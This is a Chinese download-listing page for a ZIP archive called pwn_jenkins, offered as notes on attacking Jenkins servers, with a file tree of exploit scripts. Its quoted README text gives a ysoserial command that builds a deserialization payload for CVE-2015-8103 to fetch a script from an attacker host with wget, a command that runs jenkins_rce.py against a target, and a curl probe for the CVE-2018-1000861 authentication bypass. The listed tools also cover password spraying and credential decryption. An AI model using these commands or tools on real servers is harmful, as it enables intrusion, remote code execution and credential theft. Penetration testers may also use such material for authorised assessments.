文件名称:pwn_jenkins:有关攻击Jenkins服务器的注意事项
文件大小:84KB
文件格式:ZIP
更新时间:2024-06-01 03:56:40
jenkins exploit hacking rce pentest
远程执行代码 旧版Jenkins中的反序列化RCE(CVE-2015-8103,Jenkins 1.638及更高版本) 使用生成有效负载。 然后使用RCE: java -jar ysoserial-master.jar CommonsCollections1 ' wget myip:myport -O /tmp/a.sh ' > payload.out ./jenkins_rce.py jenkins_ip jenkins_port payload.out 身份验证/ ACL绕过(CVE-2018-1000861,Jenkins <2.150.1) 详细信息。 如果Jenkins请求身份验证,但使用以下请求返回有效数据,则该漏洞很容易受到攻击: curl -k -4 -s https://example.com/securityRealm/user/admin/search/index
【文件预览】:
pwn_jenkins-master
----offline_decryption()
--------jenkins_offline_decrypt.py(7KB)
----README.md(7KB)
----pwn_jenkins.png(73KB)
----password_spraying()
--------jenkins_password_spraying.py(3KB)
----rce()
--------jenkins_rce_admin_script.py(1KB)
--------jenkins_rce_cve-2015-8103_deser.py(19KB)
----dump_builds()
--------jenkins_dump_builds.py(6KB)